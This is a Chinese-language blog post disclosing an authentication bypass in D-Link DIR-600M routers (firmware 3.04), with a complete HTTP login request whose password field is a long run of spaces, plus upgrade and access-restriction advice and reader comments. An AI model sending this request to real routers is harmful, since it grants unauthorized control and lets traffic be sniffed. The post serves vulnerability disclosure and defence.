D-Link DIR-600M 150M无线路由器的认证绕过

2017-5-22 / 6 评论 网络安全 / Mrxn

本文共计 1120 字,感谢您的耐心浏览与评论.

我只需要连接上路由器,然后查看路由器的网关地址,在浏览器打开网关地址,输入用户名admin,密码输入超过20个空格 即可成功绕过认证,进入路由管理后台.

PS:路由器固件是3.04.需要路由器为默认设置,没有修改用户名和设置特地IP才能访问管理界面.

如果你的路由器开放了广域网访问,那将很危险的.任何人都可以进入你得路由器.嗅探,窃听你得网络流量.

整个请求看起来应该类似这样的:

—————–ATTACKER REQUEST———————————–

POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

username=Admin&password=+++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send

——————–END here————————

下面附上视频链接:

1.https://www.youtube.com/watch?v=waIJKWCpyNQring

2.https://pan.lanzou.com/1171760

如果你有使用这个型号的路由器,请尽快升级,或者是设置值只能是局域网特定IP才能访问管理界面(需要配合静态路由功能设置).

标签: 路由器 攻击 认证绕过

转载:转载请注明原文链接 - D-Link DIR-600M 150M无线路由器的认证绕过


6条回应:“D-Link DIR-600M 150M无线路由器的认证绕过”

  1. 这个可以,我家就是用的WEB认证..没有设置密码,磊科的256P  请问也适用?

  2. baozi

    求教,在没有网线和WiFi密码的情况下得怎么样才能连接上路由器。一直想不通 开头的只要连接上路由器


发表评论

{view_code_no}